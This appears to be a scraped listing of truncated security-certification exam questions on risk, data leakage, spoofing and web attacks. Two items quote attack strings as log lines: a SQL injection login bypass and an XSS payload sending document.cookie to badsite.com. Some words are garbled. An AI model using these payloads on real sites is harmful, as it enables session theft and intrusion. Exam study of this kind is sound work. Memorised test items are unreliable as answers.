The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. Functions to be outsourced include: business analysts, testing, software development and back office functions that deal with the processing of customer data. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls are not implemented?

The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. Functions to be outsourced include: business analysts, testing, software development and back office functions that deal with the processing of customer data. The Chief Risk Officer (CRO) is...

Continue reading

A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO).

A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of the following additional controls MUST be implemented to minimize the risk of data...

Continue reading

An organization uses IP address block 203.0.113.0/24 on its internal network. At the border router, the network administrator sets up rules to deny packets with a source address in this subnet from entering the network, and to deny packets with a destination address in this subnet from leaving the network. Which of the following is the administrator attempting to prevent?

An organization uses IP address block 203.0.113.0/24 on its internal network. At the border router, the network administrator sets up rules to deny packets with a source address in this subnet from entering the network, and to deny packets with a destination address in this subnet from leaving the network. Which of the following...

Continue reading

Which of the following should Ann perform to test whether the website is susceptible to a simple authentication bypass?

Ann is testing the robustness of a marketing website through an intercepting proxy. She has intercepted the following HTTP request: POST /login.aspx HTTP/1.1 Host: comptia.org Content-type: text/html txtUsername=ann&txtPassword=ann&alreadyloggedln=false&submit=true Which of the following should Ann perform to test whether the website is susceptible to a simple authentication bypass?A . Remove all of the post data...

Continue reading

Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of the following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO).

Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of the following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO).A . Jail broken mobile deviceB...

Continue reading

/site/script.php?

235.62.11 "GET /site/script.php?user=admin&pass=pass%20or%201=1 HTIP/1.1" 200 5724 Given this log, which of the following is the security administrator concerned with and which fix should be implemented by the developer?A . The security administrator is concerned with nonprintable characters being used to gain administrative access, and the developer should strip all nonprintable characters.B . The...

Continue reading

Which of the following describes a risk and mitigation associated with cloud data storage?

Which of the following describes a risk and mitigation associated with cloud data storage?A . Risk: Shared hardware caused data leakage Mitigation: Strong encryption at restB . Risk: Offsite replication Mitigation: Multi-site backupsC . Risk: Data loss from de-duplication Mitigation: Dynamic host bus addressingD . Risk: Combined data archiving Mitigation: Two-factor administrator authentication View...

Continue reading

The senior security administrator wants to redesign the company DMZ to mm1m1ze the risks associated with both external and internal threats. The DMZ design must support security in depth, change management and configuration processes, and support incident reconstruction. Which of the following designs BEST supports the given requirements?

The senior security administrator wants to redesign the company DMZ to mm1m1ze the risks associated with both external and internal threats. The DMZ design must support security in depth, change management and configuration processes, and support incident reconstruction. Which of the following designs BEST supports the given requirements?A . A dual firewall DMZ with...

Continue reading

The risk manager has requested a security solution that is centrally managed, can easily be updated, and protects end users’ workstations from both known and unknown malicious attacks when connected to either the office or home network. Which of the following would BEST meet this requirement?

The risk manager has requested a security solution that is centrally managed, can easily be updated, and protects end users’ workstations from both known and unknown malicious attacks when connected to either the office or home network. Which of the following would BEST meet this requirement?A . HIPSB . UTMC . AntivirusD . NIPSE...

Continue reading

(‘><script>document.location=’http://badsite.com/?

A security administrator notices the following line in a server’s security log: <input name=’credentials’ type=’TEXT’ value=’" +request.getParameter (‘><script>document.location=’http://badsite.com/?q=’document.cookie</script>’)+’; The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this...

Continue reading